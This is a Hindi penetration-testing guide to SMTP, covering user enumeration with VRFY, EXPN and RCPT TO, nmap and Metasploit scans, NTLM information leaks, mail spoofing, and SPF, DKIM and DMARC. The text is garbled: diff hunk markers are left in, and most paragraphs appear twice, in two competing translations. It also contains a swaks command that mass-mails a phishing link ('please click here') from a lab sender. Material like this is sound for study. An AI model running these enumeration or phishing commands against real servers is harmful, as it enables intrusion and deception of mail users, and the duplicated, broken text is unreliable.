#### 2. SMTP सर्वर के साथ कनेक्शन स्थापित करें
SMTP सर्वर के साथ कनेक्शन स्थापित करने के लिए, हम निम्नलिखित तकनीकों का उपयोग कर सकते हैं:
- टेलनेट: टेलनेट क्लाइंट का उपयोग करें और SMTP सर्वर के साथ कनेक्शन स्थापित करें।
- नेटकैट: नेटकैट क्लाइंट का उपयोग करें और SMTP सर्वर के साथ कनेक्शन स्थापित करें।
#### 3. SMTP सर्वर के लिए वैध उपयोगकर्ता क्रेडेंशियल्स की जांच करें
SMTP सर्वर के लिए वैध उपयोगकर्ता क्रेडेंशियल्स की जांच करने के लिए, हम निम्नलिखित तकनीकों का उपयोग कर सकते हैं:
- वैध उपयोगकर्ता क्रेडेंशियल्स की जांच करें: उपयोगकर्ता नाम और पासवर्ड के साथ SMTP सर्वर के साथ कनेक्शन स्थापित करें और क्रेडेंशियल्स की जांच करें।
#### 4. SMTP सर्वर के लिए वैध उपयोगकर्ता की जांच करें
SMTP सर्वर के लिए वैध उपयोगकर्ता की जांच करने के लिए, हम निम्नलिखित तकनीकों का उपयोग कर सकते हैं:
- वैध उपयोगकर्ता की जांच करें: उपयोगकर्ता नाम के साथ SMTP सर्वर के साथ कनेक्शन स्थापित करें और उपयोगकर्ता की जांच करें।
#### 5. SMTP सर्वर के लिए वैध उपयोगकर्ता की जांच करें
SMTP सर्वर के लिए वैध उपयोगकर्ता की जांच करने के लिए, हम निम्नलिखित तकनीकों का उपयोग कर सकते हैं:
- वैध उपयोगकर्ता की जांच करें: उपयोगकर्ता नाम के साथ SMTP सर्वर के साथ कनेक्शन स्थापित करें और उपयोगकर्ता की जांच करें।
### एन्यूमरेशन
```bash
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
### NTLM Auth - सूचना विस्फोट
### NTLM प्रमाणीकरण - सूचना प्रकटीकरण
यदि सर्वर NTLM प्रमाणीकरण (Windows) का समर्थन करता है, तो आप संवेदनशील जानकारी (संस्करण) प्राप्त कर सकते हैं। अधिक जानकारी [**यहाँ**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666) मिलेगी
यदि सर्वर NTLM प्रमाणीकरण (Windows) का समर्थन करता है, तो आप संवेदनशील जानकारी (संस्करण) प्राप्त कर सकते हैं। अधिक जानकारी [**यहाँ**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666) पर।
```bash
root@kali: telnet example.com 587
220 example.com SMTP Server Banner
@ -137,11 +55,11 @@ NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
```
या इसे **nmap** प्लगइन `smtp-ntlm-info.nse` के साथ **स्वचालित** करें
या **स्वचालित** करें **nmap** प्लगइन `smtp-ntlm-info.nse` के साथ
### आंतरिक सर्वर नाम - सूचना विस्फोट
### आंतरिक सर्वर का नाम - सूचना प्रकटीकरण
कुछ SMTP सर्वर एक प्रेषक का पता स्वतः पूर्ण पता न देते हुए "MAIL FROM" कमांड जारी करने पर अपना आंतरिक नाम खोल देते हैं:
कुछ SMTP सर्वर "MAIL FROM" कमांड जारी करने पर जब पूरा पता नहीं दिया जाता, तब एक प्रेषक के पते को स्वतः पूरा करते हैं, जिससे उसका आंतरिक नाम प्रकट होता है:
```
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
@ -162,13 +80,13 @@ MAIL FROM: me
```
### स्निफिंग
पोर्ट 25 के पैकेट्स से कुछ पासवर्ड स्निफ करने की जांच करे
जांचें कि क्या आप पोर्ट 25 पर पैकेट्स से कुछ पासवर्ड स्निफ कर सकते है
### [ऑथ ब्रूटफोर्स](../../generic-methodologies-and-resources/brute-force.md#smtp)
### [Auth bruteforce](../../generic-methodologies-and-resources/brute-force.md#smtp)
## उपयोगकर्ता ब्रूटफोर्स गणना
## यूजरनेम ब्रूटफोर्स एन्युमरेशन
**प्रमाणीकरण हमेशा आवश्यक नहीं होता है**
**प्रमाणीकरण हमेशा आवश्यक नहीं होता**
### RCPT TO
```bash
@ -189,10 +107,6 @@ RCPT TO:ed
250 2.1.5 ed... Recipient ok
```
### VRFY
VRFY (Verify) का उपयोग SMTP (Simple Mail Transfer Protocol) सर्वर पर उपयोगकर्ता खातों की पुष्टि करने के लिए किया जाता है। यह एक आम SMTP कमांड है जिसका उपयोग उपयोगकर्ता खातों की उपस्थिति की जांच करने के लिए किया जाता है। यदि उपयोगकर्ता खाता मौजूद है, तो सर्वर एक सफलतापूर्वक प्रतिक्रिया भेजेगा, अन्यथा एक त्रुटि संदेश भेजेगा।
यह एक आम टेक्निक है जिसका उपयोग उपयोगकर्ता खातों की जांच करने, उपयोगकर्ता खातों की एक सूची प्राप्त करने और एक निश्चित उपयोगकर्ता खाते की जांच करने के लिए किया जाता है। यह एक प्राथमिक तकनीक है जिसका उपयोग करके हम उपयोगकर्ता खातों की जानकारी प्राप्त कर सकते हैं और इसका उपयोग अन्य हमलों के लिए तैयारी करने में किया जा सकता है।
```
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
@ -209,20 +123,6 @@ VRFY blah
550 blah... User unknown
```
### EXPN
The EXPN command is used to expand a mailing list on an SMTP server. It can be used to obtain information about the members of a mailing list, including their email addresses. This command can be useful for reconnaissance purposes during a penetration test.
To use the EXPN command, you can simply send the following command to the SMTP server:
```
EXPN <mailing_list_name>
```
Replace `<mailing_list_name>` with the name of the mailing list you want to expand. If the server supports the EXPN command and the mailing list exists, it will respond with the expanded list of email addresses.
It's important to note that not all SMTP servers support the EXPN command, as it can be a security risk. Some servers may disable this command to prevent unauthorized access to mailing list information.
During a penetration test, the EXPN command can be used to gather information about potential targets or to verify the existence of specific email addresses. However, it's crucial to obtain proper authorization before performing any penetration testing activities.
```
$ telnet 10.0.10.1 25
Trying 10.0.10.1...
@ -240,18 +140,6 @@ EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>
```
### स्वचालित उपकरण
Automatic tools are software programs that are designed to perform specific tasks automatically, without the need for manual intervention. In the context of username enumeration techniques, automatic tools can be used to quickly and efficiently enumerate usernames on a target system.
There are several automatic tools available that can be used for username enumeration during a penetration test. These tools leverage various techniques to gather information about valid usernames on a target system. Some common techniques used by these tools include:
- **Dictionary-based attacks**: These tools use a predefined list of common usernames and passwords to attempt to log in to a target system. By comparing the response received from the system, the tool can determine if a username is valid or not.
- **Brute-force attacks**: These tools systematically generate and test different combinations of usernames and passwords to gain unauthorized access to a target system. By analyzing the response received from the system, the tool can identify valid usernames.
- **User enumeration attacks**: These tools exploit vulnerabilities in the target system's authentication mechanism to determine if a username is valid or not. For example, some systems may respond differently when an invalid username is entered compared to a valid username. By analyzing these responses, the tool can identify valid usernames.
It is important to note that the use of automatic tools for username enumeration should be done with caution and with proper authorization. Unauthorized or malicious use of these tools can lead to legal consequences.
```
Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
@ -259,16 +147,16 @@ Nmap: nmap --script smtp-enum-users <IP>
```
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**ड्रैगनजार सुरक्षा सम्मेलन एक अंतर्राष्ट्रीय साइबर सुरक्षा कार्यक्रम है**](https://www.dragonjarcon.org/), जो 7 और 8 सितंबर 2023 को कोलंबिया के बोगोटा में आयोजित होगा। यह एक तकनीकी भरपूर सामग्री वाला आयोजन है जहां स्पेनिश में नवीनतम शोध प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करते हैं।\
इस महान सम्मेलन को न छोड़ें, अब नीचे दिए गए लिंक पर रजिस्टर करें!:
[**DragonJAR Security Conference एक अंतरराष्ट्रीय साइबर सुरक्षा इवेंट है**](https://www.dragonjarcon.org/) जो एक दशक से अधिक समय से आयोजित हो रहा है और 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में होगा। यह एक उच्च तकनीकी सामग्री वाला इवेंट है जहां नवीनतम शोध प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करते हैं।\
अभी निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
## DSN रिपोर्ट
## DSN रिपोर्ट्स
**वितरण स्थिति सूचना रिपोर्ट**: यदि आप किसी संगठन को एक **अमान्य पते** पर एक **ईमेल** भेजते हैं, तो संगठन आपको एक **मेल वापस भेजकर** बताएगा कि पता अमान्य है। वापस भेजे गए ईमेल के **हैडर** में संभावित **संवेदनशील जानकारी** होगी (जैसे रिपोर्ट के साथ संवाद करने वाले मेल सेवा के IP पते या एंटीवायरस सॉफ़्टवेयर जानकारी)।
**Delivery Status Notification Reports**: यदि आप किसी संगठन को **ईमेल** भेजते हैं और वह **अमान्य पते** पर होता है, तो संगठन आपको सूचित करेगा कि पता अमान्य था और आपको **वापस मेल भेजेगा**। लौटाए गए ईमेल के **हेडर्स** में संभावित **संवेदनशील जानकारी** शामिल हो सकती है (जैसे कि मेल सेवाओं का IP पता जो रिपोर्ट्स के साथ इंटरैक्ट करते हैं या एंटी-वायरस सॉफ्टवेयर की जानकारी)।
## [Commands](smtp-commands.md)
## [कमांड्स](smtp-commands.md)
### लिनक्स कंसोल से ईमेल भेजना
```
@ -288,43 +176,9 @@ Sincerely,
```bash
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
```
### Python के साथ ईमेल भेजना
### पायथन के साथ ईमेल भेजना
यहां पायथन स्क्रिप्ट के साथ ईमेल भेजने का एक वैकल्पिक तरीका है।
```python
import smtplib
def send_email(sender_email, receiver_email, subject, message):
try:
# सर्वर के साथ कनेक्ट करें
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(sender_email, 'your_password')
# ईमेल तैयार करें
email_message = f'Subject: {subject}\n\n{message}'
# ईमेल भेजें
server.sendmail(sender_email, receiver_email, email_message)
print('Email sent successfully!')
except Exception as e:
print(f'An error occurred: {e}')
finally:
# सर्वर से कनेक्शन बंद करें
server.quit()
# ईमेल भेजने के लिए आवश्यक जानकारी
sender_email = 'your_email@gmail.com'
receiver_email = 'receiver_email@gmail.com'
subject = 'Hello from Python!'
message = 'This is a test email sent using Python.'
# ईमेल भेजें
send_email(sender_email, receiver_email, subject, message)
```
यहां `sender_email` और `receiver_email` को अपने वास्तविक ईमेल पते के साथ बदलें और `your_password` को अपने ईमेल खाते के पासवर्ड से बदलें। फिर आप इस स्क्रिप्ट को चला सकते हैं और ईमेल भेज सकते हैं।
यहाँ पायथन स्क्रिप्ट के साथ ईमेल भेजने का एक वैकल्पिक तरीका है
```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
@ -369,38 +223,50 @@ print("[***]successfully sent email to %s:" % (msg['To']))
```
## मेल स्पूफिंग
इस अध्याय का अधिकांश भाग पुस्तक **नेटवर्क सुरक्षा मूल्यांकन 3 वीं संस्करण** से निकाला गया है।
इस खंड का अधिकांश भाग **Network Security Assessment 3rd Edition** पुस्तक से लिया गया है।
SMTP संदेश आसानी से स्पूफ किए जा सकते हैं, इसलिए संगठन **SPF**, **DKIM**, और **DMARC** सुविधाओं का उपयोग करते हैं ताकि पक्ष अनधिकृत ईमेल भेजने से रोक सकें।
SMTP संदेशों को आसानी से स्पूफ किया जा सकता है, इसलिए संगठन **SPF**, **DKIM**, और **DMARC** सुविधाओं का उपयोग करके अनधिकृत ईमेल भेजने से रोकते हैं।
इन प्रतिबंधों के **पूर्ण गाइड** के बारे में यहां जानकारी मिल सकती है: [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/)
**इन उपायों की पूरी गाइड** आप [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/) पर पा सकते हैं।
### SPF
{% hint style="danger" %}
SPF [2014 में "विराम" कर दिया गया था](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/)। इसका अर्थ है कि इसके बजाय `_spf.domain.com` में **TXT रिकॉर्ड** बनाने की बजाय आपको `domain.com` में उसी वाक्यांश का उपयोग करना होगा।\
इसके अलावा, पिछले spf रिकॉर्ड का पुनः उपयोग करना सामान्य है, जैसे `"v=spf1 include:_spf.google.com ~all"` ऐसा कुछ भी मिल सकता है।
SPF को 2014 में "deprecated" किया गया था। इसका मतलब है कि `_spf.domain.com` में **TXT record** बनाने के बजाय आप इसे `domain.com` में **वही सिंटैक्स** का उपयोग करके बनाते हैं।\
इसके अलावा, पिछले spf रिकॉर्ड्स का पुन: उपयोग करने के लिए आमतौर पर आपको कुछ इस तरह का मिल सकता है `"v=spf1 include:_spf.google.com ~all"`
{% endhint %}
**भेजने वाली नीति ढांचा** (SPF) एक ऐसी तंत्रिका प्रदान करता है जो एमटीएएस को यह जांचने की अनुमति देता है कि ईमेल भेजने वाला होस्ट अधिकृत है या नहीं।\
फिर, संगठन एक अधिकृत मेल सर्वरों की सूची को परिभाषित कर सकते हैं और एमटीएएस इस सूची के लिए क्वेरी कर सकते हैं ताकि ईमेल स्पूफ किया गया है या नहीं।\
एक डोमेन नाम के लिए ईमेल भेजने की अनुमति देने वाले आईपी ​​पते / सीमाओं, डोमेन और अन्यों को परिभाषित करने के लिए, SPF रजिस्ट्री में विभिन्न "**मेकेनिज़्म**" प्रकट हो सकते हैं।
**Sender Policy Framework** (SPF) एक तंत्र प्रदान करता है जो MTAs को यह जांचने की अनुमति देता है कि ईमेल भेजने वाला होस्ट अधिकृत है या नहीं।\
फिर, संगठन अधिकृत मेल सर्वरों की एक सूची परिभाषित कर सकते हैं और MTAs इस सूची को क्वेरी कर सकते हैं ताकि यह जांच सकें कि ईमेल स्पूफ किया गया है या नहीं।\
किसी डोमेन नाम की ओर से ईमेल भेजने के लिए **अनुमत IP पते/रेंज, डोमेन और अन्य** को परिभाषित करने के लिए, SPF रजिस्ट्री में विभिन्न "**Mechanism**" दिखाई दे सकते हैं।
#### मेकेनिज़्म
#### Mechanisms
| मेकेनिज़्म | विवरण |
| Mechanism | Description |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| सब | हमेशा मिलता है; पिछले मेकेनिज़्मों द्वारा मिलाए गए सभी आईपी के लिए डिफ़ॉल्ट परिणाम के लिए उपयोग किया जाता है। |
| ए | यदि डोमेन नाम के पास ऐड्रेस रिकॉर्ड (ए या एएएए) है जिसे भेजने वाले के पते को हल किया जा सकता है, तो यह मिलेगा। |
| आईपी4 | यदि भेजने वाला दिए गए IPv4 पते के भीतर है, तो मिलेगा। |
| आईपी6 | यदि भेजने वाला दिए गए IPv6 पते के भीतर है, तो मिलेगा। |
| एमएक्स | यदि डोमेन नाम के पास भेजने वाले के पते को हल करने वाला एमएक्स रिकॉर्ड है, तो मिलेगा (अर्थात पत्र डोमेन के आगमन करने वाले मेल सर्वरों में से एक से मेल आता है)। |
| पीटीआर | यदि ग्राहक के पते के लिए डोमेन नाम (पीटीआर रिकॉर्ड) दिए गए डोमेन में है और वह डोमेन नाम ग्राहक के पते को हल करता है (फ़ॉरवर्ड-कन्फ़र्म्ड रिवर्स DNS), तो मिलेगा। यह मेकेनिज़्म अस्वीकार किया जाता है और यदि संभव हो तो इससे बचना चाहिए। |
| मौजूद है | यदि दिए गए डोमेन नाम को किसी भी पते को हल करता है, तो मिलेगा (चाहे वह पता किसी भी पते को हल करता हो)। यह बहुत कम उपयोग होता है। SPF मैक्रो भाषा के साथ इसका उपयोग DNSBL-क्वेरी जैसे अधिक जटिल मिलान करने के लिए करता है। |
| शामिल करें | दूसरे डोमेन की नीति का संदर्भ देता है। यदि उस डोमेन की नीति पास होती है, तो यह मेकेनिज़्म पास होता है। हालांकि, यदि सम्मिलित नीति असफल होती है, तो प्रसंस्करण जारी रहता है। दूसरे डोमेन की नीति को पूरी तरह से सौंपने के लिए, पुनर्निर्देशन विस्तार का उपयोग किया जाना चाहिए। |
| पुनर्निर्देशन | <p>पुनर्निर्देशन एक ऐसा दूसरे डोमेन नाम के लिए पॉइंटर है जिसमें एक SPF नीति होती है, इससे कई डोमेन एक ही SPF नीति का उपयोग कर सकते हैं। यह जब काम में लिया जाता है जब एक बड़ी संख्या के डोमेन के साथ काम किया जा रहा हो जो एक ही ईमेल इंफ्रास्ट्रक्चर को साझा करते हैं।</p><p>पुनर्निर्देशन मेकेनिज़्म में निर्दिष्ट किए गए डोमेन की SPF नीति का उपयोग किया जाएगा।</p> |
| ALL | हमेशा मैच करता है; पहले के मैकेनिज्म द्वारा मैच नहीं किए गए सभी IPs के लिए एक डिफ़ॉल्ट परिणाम के रूप में `-all` का उपयोग किया जाता है। |
| A | यदि डोमेन नाम का एक पता रिकॉर्ड (A या AAAA) है जो प्रेषक के पते को हल कर सकता है, तो यह मैच होगा। |
| IP4 | यदि प्रेषक एक निर्दिष्ट IPv4 पता रेंज में है, मैच करें। |
| IP6 | यदि प्रेषक एक निर्दिष्ट IPv6 पता रेंज में है, मैच करें। |
| MX | यदि डोमेन नाम का एक MX रिकॉर्ड प्रेषक के पते को हल करता है, तो यह मैच होगा (अर्थात् मेल डोमेन के आने वाले मेल सर्वरों में से एक से आता है)। |
| PTR | यदि क्लाइंट के पते के लिए डोमेन नाम (PTR रिकॉर्ड) दिए गए डोमेन में है और वह डोमेन नाम क्लाइंट के पते को हल करता है (फॉरवर्ड-कन्फर्म्ड रिवर्स DNS), मैच करें। यह मैकेनिज्म निरुत्साहित किया जाता है और संभव हो तो इससे बचा जाना चाहिए। |
| EXISTS | यदि दिया गया डोमेन नाम किसी भी पते को हल करता है, मैच करें (चाहे वह किस पते को हल करता है)। यह दुर्लभता से उपयोग किया जाता है। SPF मैक्रो भाषा के साथ यह DNSBL-क्वेरीज जैसे अधिक जटिल मैच प्रदान करता है। |
| INCLUDE | दूसरे डोमेन की नीति का संदर्भ लेता है। यदि उस डोमेन की नीति पास होती है, तो यह मैकेनिज्म पास होता है। हालांकि, यदि शामिल की गई नीति विफल होती है, तो प्रोसेसिंग जारी रहती है। किसी अन्य डोमेन की नीति को पूरी तरह से प्रतिनिधित्व करने के लिए, रीडायरेक्ट एक्सटेंशन का उपयोग किया जाना चाहिए। |
| REDIRECT | <p>रीडायरेक्ट एक अन्य डोमेन नाम की ओर इशारा करता है जो एक SPF नीति की मेजबानी करता है, यह उन बहुत सारे डोमेन्स के लिए उपयोगी है जो एक ही ईमेल इंफ्रास्ट्रक्चर को साझा करते हैं।</p><p>रीडायरेक्ट मैकेनिज्म में दर्शाए गए डोमेन की SPF नीति का उपयोग किया जाएगा।</p> |
**क्वालिफ़ायर्स** भी पहचानने के लिए संभव हैं, जो **यह निर्दिष्ट करते हैं कि यदि कोई मेकेनिज़्म मिलता है तो क्या किया जाना चाहिए**। डिफ़ॉल्ट रूप से, **क्वालिफ़ायर "+"** का उपयोग किया जाता है (इसलिए यदि कोई
यह भी संभव है कि **Qualifiers** की पहचान की जा सके जो इंगित करते हैं **कि यदि कोई मैकेनिज्म मैच होता है तो क्या किया जाना चाहिए**। डिफ़ॉल्ट रूप से, **qualifier "+"** का उपयोग किया जाता है (इसलिए यदि कोई मैकेनिज्म मैच होता है, इसका मतलब है कि यह अनुमत है)।\
आमतौर पर आप **प्रत्येक SPF नीति के अंत में** कुछ इस तरह देखेंगे: **\~all** या **-all**। इसका उपयोग यह इंगित करने के लिए किया जाता है कि **यदि प्रेषक किसी भी SPF नीति से मैच नहीं करता है, तो आपको ईमेल को अविश्वसनीय के रूप में टैग करना चाहिए (\~) या ईमेल को अस्वीकार करना चाहिए (-)।**
#### Qualifiers
प्रत्येक मैकेनिज्म को चार qualifiers में से एक के साथ संयोजित किया जा सकता है:
* **`+`** PASS परिणाम के लिए। इसे छोड़ा जा सकता है; उदाहरण के लिए, `+mx` का मतलब `mx` ही होता है।
* **`?`** NEUTRAL परिणाम के लिए जिसे NONE (कोई नीति नहीं) की तरह व्याख्या किया जाता है।
* **`~`** (टिल्ड) SOFTFAIL के लिए, NEUTRAL और FAIL के बीच एक डिबगिंग सहायता। आमतौर पर, SOFTFAIL वापस करने वाले संदेशों को स्वीकार किया जाता है लेकिन टैग किया जाता है।
* **`-`** (माइनस) FAIL के लिए, मेल को अस्वीकार किया जाना चाहिए (नीचे देखें)।
निम्नलिखित उदाहरण में आप **google.com की SPF नीति** पढ़ सकते हैं। ध्यान दें कि **पहली SPF नीति अन्य डोमेन्स की SPF नीतियों को कैसे शामिल करती है:**
```shell-session
kali@kali:~$ dig txt google.com | grep spf
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
@ -419,15 +285,15 @@ _netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36
kali@kali:~$ dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
```
पारंपरिक रूप से, वहाँ किसी भी डोमेन नाम को छल करना संभव था जिसमें सही/कोई भी SPF रिकॉर्ड नहीं था। **आजकल**, यदि **ईमेल** किसी **डोमेन से आता है जिसमें एक मान्य SPF रिकॉर्ड नहीं है**, तो यह शायद **स्वतः अस्वीकृत/अविश्वसनीय चिह्नित** किया जाएगा
पारंपरिक रूप से यह संभव था कि किसी भी डोमेन नाम को स्पूफ किया जा सकता है जिसका सही/कोई SPF रिकॉर्ड नहीं होता था। **आजकल**, यदि **ईमेल** किसी **डोमेन से आता है जिस मान्य SPF रिकॉर्ड नहीं है** तो संभवतः उसे **अस्वीकृत/स्वतः अविश्वसनीय के रूप में चिह्नित किया जाएगा**
डोमेन के SPF की जांच के लिए आप ऑनलाइन उपकरण जैसे उपयोग कर सकते हैं: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
डोमेन के SPF की जांच करने के लिए आप ऑनलाइन टूल्स का उपयोग कर सकते हैं जैसे: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
### DKIM
डोमेनकीजीय पहचान वाला मेल (DKIM) एक तरीका है जिसमें **बाहरी ईमेल को हस्ताक्षरित किया जाता है और डोमेन की सार्वजनिक कुंजी को DNS के माध्यम से प्राप्त करने पर विदेशी MTAs द्वारा सत्यापित किया जाता है**। DKIM सार्वजनिक कुंजी एक डोमेन के लिए एक TXT रिकॉर्ड में रखी जाती है; हालांकि, आपको इसे प्राप्त करने के लिए उबाऊ और डोमेन नाम दोनों को जानना चाहिए।
DomainKeys Identified Mail (DKIM) एक तंत्र है जिसके द्वारा **बाहरी ईमेल को हस्ताक्षरित किया जाता है और विदेशी MTAs द्वारा DNS के माध्यम से डोमेन की सार्वजनिक कुंजी प्राप्त करके मान्य किया जाता है**। DKIM सार्वजनिक कुंजी एक डोमेन के लिए TXT रिकॉर्ड के भीतर रखी जाती है; हालांकि, आपको इसे प्राप्त करने के लिए सिलेक्टर और डोमेन नाम दोनों का पता होना चाहिए।
फिर, कुंजी के लिए आपको मेल हेडर `DKIM-Signature` के मेल के उबाऊ और डोमेन नाम की मांग करनी होगी, उदाहरण के लिए: `d=gmail.com;s=20120113`
फिर, कुंजी मांगने के लिए आपको डोमेन नाम और मेल हेडर `DKIM-Signature` से मेल का सिलेक्टर चाहिए होता है उदाहरण के लिए: `d=gmail.com;s=20120113`
```bash
dig 20120113._domainkey.gmail.com TXT | grep p=
20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCg
@ -435,11 +301,11 @@ KCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn
```
### DMARC
डोमेन-आधारित संदेश प्रमाणीकरण, रिपोर्टिंग और अनुरूा (DMARC) एक मेल प्रमाणीकरण का तरीका है जो SPF और DKIM पर आधारित है। नीतियाँ मेल सर्वरों को बताती हैं कि एक दिए गए डोमेन के लिए ईमेल को कैसे प्रोसेस करना है और किन कार्रवाईयों की रिपोर्ट करनी है
डोमेन-आधारित संदेश प्रमाणीकरण, रिपोर्टिंग और अनुपालन (DMARC) एक प्रकार का मेल प्रमाणीकरण है जो SPF और DKIM पर आधारित है। नीतियां मेल सर्वरों को निर्देश देती हैं कि किसी दिए गए डोमेन के लिए ईमेल को कैसे संसाधित किया जाए और किए गए कार्यों पर रिपोर्ट करें
![](<../../.gitbook/assets/image (134).png>)
**DMARC रिकॉर्ड प्राप्त करने के लिए, आपको उप-डोमेन \_dmarc को क्वेरी करनी होगी**
**DMARC रिकॉर्ड प्राप्त करने के लिए, आपको सबडोमेन \_dmarc की क्वेरी करनी होगी**
```shell-session
root@kali:~# dig _dmarc.yahoo.com txt | grep DMARC
_dmarc.yahoo.com. 1785 IN TXT "v=DMARC1\; p=reject\; sp=none\; pct=100\;
@ -452,40 +318,38 @@ root@kali:~# dig _dmarc.paypal.com txt | grep DMARC
_dmarc.paypal.com. 300 IN TXT "v=DMARC1\; p=reject\; rua=mailto:d@rua.agari.com\;
ruf=mailto:dk@bounce.paypal.com,mailto:d@ruf.agari.com"
```
PayPal और Yahoo मेल सर्वरों को निर्देशित करते हैं कि वे ऐसे संदेशों को अस्वीकार करें जिनमें अमान्य DKIM हस्ताक्षर हों या जो उनके नेटवर्क से उत्पन्न नहीं होते हैं। इन संदेशों के बारे में सूचनाएं फिर संबंधित संगठन के प्रत्येक ईमेल पते पर भेजी जाती हैं। Google भी एक समान तरीके से कॉन्फ़िगर किया गया है, हालांकि यह मेल सर्वरों को संदेशों को क्वारंटीन करने के लिए निर्देशित करता है और उन्हें सीधे अस्वीकार नहीं करता।
#### DMARC टैग्स
#### DMARC टैग
| टैग नाम | उद्देश्य | उदाहरण |
| -------- | ------------------------------------------------- | ------------------------------- |
| v | प्रोटोकॉल संस्करण | v=DMARC1 |
| pct | संदेशों का प्रतिशत जिन्हें फ़िल्टरिंग के लिए चुना गया है | pct=20 |
| ruf | फोरेंसिक रिपोर्ट्स के लिए रिपोर्टिंग URI | ruf=mailto:authfail@example.com |
| rua | सामूहिक रिपोर्ट्स के लिए रिपोर्टिंग URI | rua=mailto:aggrep@example.com |
| p | संगठनात्मक डोमेन के लिए नीति | p=quarantine |
| sp | OD के सबडोमेन्स के लिए नीति | sp=reject |
| adkim | DKIM के लिए संरेखन मोड | adkim=s |
| aspf | SPF के लिए संरेखन मोड | aspf=r |
| टैग नाम | उद्देश्य | उदाहरण |
| -------- | --------- | ------- |
| v | प्रोटोकॉल संस्करण | v=DMARC1 |
| pct | फ़िल्टरिंग के लिए विषयित संदेशों का प्रतिशत | pct=20 |
| ruf | फॉरेंसिक रिपोर्ट के लिए रिपोर्टिंग URI | ruf=mailto:authfail@example.com |
| rua | समष्टि रिपोर्ट के लिए रिपोर्टिंग URI | rua=mailto:aggrep@example.com |
| p | संगठनात्मक डोमेन के लिए नीति | p=quarantine |
| sp | संगठनात्मक डोमेन के उप-डोमेनों के लिए नीति | sp=reject |
| adkim | DKIM के लिए संरेखण मोड | adkim=s |
| aspf | SPF के लिए संरेखण मोड | aspf=r |
### **सबडोमेन्स के बारे में क्या?**
### **उप-डोमेनों के बारे में क्या?**
**यहाँ से** [**यहाँ**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
आपको प्रत्येक सबडोमेन से मेल भेजने के लिए अलग SPF रिकॉर्ड्स की आवश्यकता होती है।\
निम्नलिखित मूल रूप से openspf.org पर पोस्ट किया गया था, जो इस तरह की चीजों के लिए एक शानदार संसाधन हुआ करता था।
**यहां से** [**यहां**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
आपको उन सभी उप-डोमेनों के लिए अलग-अलग SPF रिकॉर्ड होने चाहिए जिनसे आप मेल भेजना चाहते हैं।\
यह शुरुआत में openspf.org पर पोस्ट किया गया था, जो इस तरह की चीजों के लिए एक महान स्रोत था।
> डेमन प्रश्न: उप-डोमेनों के बारे में क्या है?
> द डेमन क्वेश्चन: सबडोमेन्स के बारे में क्या?
>
> अगर मुझे pielovers.demon.co.uk से मेल मिलता है और pielovers के लिए SPF डेटा नहीं है, तो क्या मैं demon.co.uk के लिए SPF की जांच करने के लिए वापस जाऊं? नहीं। डेमन में प्रत्येक उप-डोमेन एक अलग ग्राहक होता है, और प्रत्येक ग्राहक के पास अपनी नीति हो सकती है। डेमन की नीति को डिफ़ॉल्ट रूप से सभी ग्राहकों पर लागू करना संभव नहीं होगा; अगर डेमन ऐसा करना चाहता है, तो वह प्रत्येक उप-डोमेन के लिए SPF रिकॉर्ड सेट कर सकता है।
